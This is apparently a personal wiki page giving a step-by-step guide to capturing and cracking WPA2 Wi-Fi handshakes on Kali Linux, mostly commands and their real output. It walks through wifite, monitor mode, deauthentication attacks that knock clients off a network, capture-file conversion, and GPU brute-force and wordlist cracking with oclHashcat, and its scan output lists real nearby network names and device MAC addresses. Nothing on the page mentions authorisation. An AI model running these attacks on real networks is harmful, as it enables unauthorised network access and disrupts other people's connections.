{{tag>[security crack wpa wpa2 handshake kali]}}
=====Capture WPA2 handshake=====
====Hardware====
* Intel NUC
* Intel Centrino 6235
====Install Kali====
* Install Kali from USB.
* Create user account.
* Update.apt-get update
apt-get upgrade
* Install and enable SSHd. apt-get install ssh
/etc/init.d/ssh start
update-rc.d ssh enable
====Capture with wifite====
* Start scanning. # wifite wpa2
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- ------
1 ------- 1 WPA2 34db no client
2 ------- 13 WPA2 34db no clients
3 UPC245788570 11 WPA2 30db wps
4 UPC486785_EXT 11 WPA2 26db wps
5 UPC WifiSpots 11 WPA2 25db no
6 UPC486785 11 WPA2 22db no clients
7 ------- 11 WPA2 21db no
8 UPC1461170 1 WPA2 19db no clients
9 VGV7519558FA2 6 WPA2 18db wps
10 UPC WifiSpots 1 WPA2 18db no
11 ------- 11 WPA2 18db no client
12 UPC501677338 36 WPA2 17db no
13 UPC245248760 6 WPA2 16db wps client
14 ------- 100 WPA2 15db no
15 H368N67798A 6 WPA2 13db wps
16 Ka1717169 9 WPA2 13db no client
17 UPC249259973 11 WPA2 13db wps client
18 UPC244634263 11 WPA2 13db wps
19 UPC240228706 1 WPA2 13db wps client
20 UPC WifiSpots 9 WPA2 12db no
21 UPC1263286 6 WPA2 11db no
22 UPC2176918 6 WPA2 11db no
23 UPC WifiSpots 6 WPA2 11db no
24 ------- 6 WPA2 10db wps
25 ------- 1 WPA2 10db wps
26 Sitecom8CF98C 8 WPA2 10db wps
27 ------- 1 WPA2 9db no
28 ------- 6 WPA2 9db no
29 UPC247811359 1 WPA2 9db wps clients
30 UPC241613374 11 WPA2 9db wps
31 UPC0988912 13 WPA2 7db no client
[0:01:54] scanning wireless networks. 31 targets and 15 clients found
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
* Press ctrl-c when ready
* Enter target number. [+] select target numbers (1-19) separated by commas, or 'all': 2
[+] 1 target selected.
[0:08:20] starting wpa handshake capture on "--------"
[0:08:09] new client found: 04:F7:E4:51:E7:A8
[0:08:08] listening for handshake...
[0:00:12] handshake captured! saved as "hs/--------.cap"
[+] 1 attack completed:
[+] 1/1 WPA attacks succeeded
Schenkel (D4:CA:6D:53:23:41) handshake captured
saved as hs/--------.cap
[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict command-line argument
[+] quitting
* Clean the capture file. # wpaclean cleanwpa.cap --------.cap
Pwning --------.cap (1/1 100%)
Net d4:ca:6d:53:23:41 --------
Done
* Convert .cap file to .hccap format for olcHashcat. # aircrack-ng cleanwpa.cap -J out
Opening cleanwpa.cap
Read 3 packets.
# BSSID ESSID Encryption
1 D4:CA:6D:53:23:41 -------- WPA (1 handshake)
Choosing first network as target.
Opening cleanwpa.cap
Reading packets, please wait...
Building Hashcat (1.00) file...
[*] ESSID (length: 8): --------
[*] Key version: 2
[*] BSSID: D4:CA:6D:53:23:41
[*] STA: 04:F7:E4:51:E7:A8
[*] anonce:
3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
[*] snonce:
C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
[*] Key MIC:
AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1
[*] eapol:
01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
04 01 00 00 0F AC 02 0C 00
Successfully written to out.hccap
Quitting aircrack-ng...
* Try cracking with olcHashcat. oclHashcat64.exe -m 2500 out-wpa2.hccap -a 3 -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1?1?1
Session.Name...: oclHashcat
Status.........: Aborted
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1?1?1?1?1) [12]
Hash.Target....: -------- (04:f7:e4:51:e7:a8 <-> d4:ca:6d:53:23:41)
Hash.Type......: WPA/WPA2
Time.Started...: Thu Jun 12 22:01:32 2014 (2 mins, 5 secs)
Time.Estimated.: > 10 Years
Speed.GPU.#1...: 126.6 kH/s
Speed.GPU.#2...: 129.0 kH/s
Speed.GPU.#3...: 129.2 kH/s
Speed.GPU.#4...: 124.4 kH/s
Speed.GPU.#5...: 129.1 kH/s
Speed.GPU.#6...: 129.0 kH/s
Speed.GPU.#*...: 767.2 kH/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 94814208/16533293572437839872 (0.00%)
Skipped........: 0/94814208 (0.00%)
Rejected.......: 0/94814208 (0.00%)
HWMon.GPU.#1...: 83% Util, 61c Temp, 61% Fan
HWMon.GPU.#2...: 86% Util, 62c Temp, 60% Fan
HWMon.GPU.#3...: 84% Util, 65c Temp, 48% Fan
HWMon.GPU.#4...: 85% Util, 63c Temp, 44% Fan
HWMon.GPU.#5...: 84% Util, 58c Temp, 40% Fan
HWMon.GPU.#6...: 87% Util, 63c Temp, 48% Fan
Started: Thu Jun 12 22:01:32 2014
Stopped: Thu Jun 12 22:03:40 2014
* Or try with wordlist and rules.oclHashcat64.exe -a 0 -r rules\best64.rule -m 2500 -o foundpass.txt out-wpa2.hccap totaal_cleanfile.txt
====Capture with airmon-ng airodump-ng====
* Enable monitor mode on WiFi. # airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2506 NetworkManager
2633 wpa_supplicant
Interface Chipset Driver
wlan0 Intel 6235 iwlwifi - [phy0]
(monitor mode enabled on mon0)
* Find nearest wireless networks. If targetting specific AP, fix channel with '-c ' # airodump-ng mon0
CH 8 ][ Elapsed: 1 min ][ 2014-06-12 21:06
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
D4:CA:6D:53:23:41 -61 158 25 0 13 54e. WPA2 CCMP PSK --------
D4:CA:6D:52:5D:E9 -61 141 13 0 1 54e. WPA2 CCMP PSK --------
DC:71:44:DE:35:F8 -66 234 0 0 11 54e WPA2 CCMP PSK UPC245788570
04:A1:51:22:3A:34 -76 158 8 0 11 54e WPA2 CCMP PSK UPC486785_EXT
EA:40:F2:B1:A3:E7 -76 131 0 0 11 54e WPA2 CCMP MGT UPC WifiSpots
E8:40:F2:B1:A3:E5 -78 134 9 0 11 54e WPA2 CCMP PSK UPC486785
CE:BC:C8:FE:EA:C3 -80 85 0 0 11 54e. WPA2 CCMP PSK --------
C8:BC:C8:FE:EA:C3 -80 93 2 0 11 54e. WPA2 CCMP PSK --------
44:32:C8:FC:EB:9B -84 40 0 0 1 54e WPA2 CCMP PSK UPC1461170
88:03:55:55:8F:A2 -83 61 0 0 6 54e WPA2 CCMP PSK VGV7519558FA2
5C:A3:9D:80:A3:98 -83 44 0 0 6 54e WPA2 CCMP PSK UPC245248760
46:32:C8:FC:EB:9D -85 40 0 0 1 54e WPA2 CCMP MGT UPC WifiSpots
8C:E0:81:67:79:8A -86 20 0 0 6 54e WPA2 CCMP PSK H368N67798A
14:49:E0:A4:70:28 -86 13 3 0 11 54e WPA2 CCMP PSK UPC249259973
5C:A3:9D:98:21:F8 -86 17 0 0 11 54e WPA2 CCMP PSK UPC244634263
5C:A3:9D:FD:13:E8 -85 36 0 0 1 54e WPA2 CCMP PSK UPC240228706
00:0C:F6:91:6A:78 -88 22 1 0 11 54e. WPA2 CCMP PSK Sitecom916A78
C4:27:95:75:D8:95 -1 0 0 0 7 -1
DC:71:44:A8:08:88 -90 2 0 0 1 54e WPA2 CCMP PSK UPC242046314
CE:BC:C8:FE:EA:C4 -86 1 0 0 100 54e WPA2 CCMP PSK --------
DC:71:44:DE:35:F0 -84 1 0 0 36 54e WPA2 CCMP PSK UPC501677338
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 14:99:E2:43:58:65 -82 0 - 1 0 11 UPC1461170
(not associated) F0:25:B7:EB:D2:83 -90 0 - 1 0 1 H368N67798A
D4:CA:6D:53:23:41 74:E1:B6:95:01:69 -71 0e- 0 0 9
D4:CA:6D:53:23:41 04:F7:E4:51:E7:A8 -84 0 -24 10 8 --------
E8:40:F2:B1:A3:E5 04:A1:51:22:3A:34 -1 0e- 0 0 1
C8:BC:C8:FE:EA:C3 F0:27:65:D7:0D:09 -86 0 - 1 0 1
44:32:C8:FC:EB:9B A4:D1:D2:6A:1B:1D -1 1e- 0 0 1
14:49:E0:A4:70:28 C0:CB:38:01:1D:31 -1 1e- 0 0 1
C4:27:95:75:D8:95 00:22:FA:96:D5:0C -82 0 - 6e 0 4
* Dump packets from target channel. # airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0
* Wait for handshake... or
* Deauthenticate client from network. # aireplay-ng --deauth 0 -a -c mon0
* Or if you don't know the MAC of any associated client, broadcast a deauth. # aireplay-ng --deauth 0 -a mon0
* Extract handshakes. tshark -r -R eapol || wlan.fc.type_subtype == 0×88 -w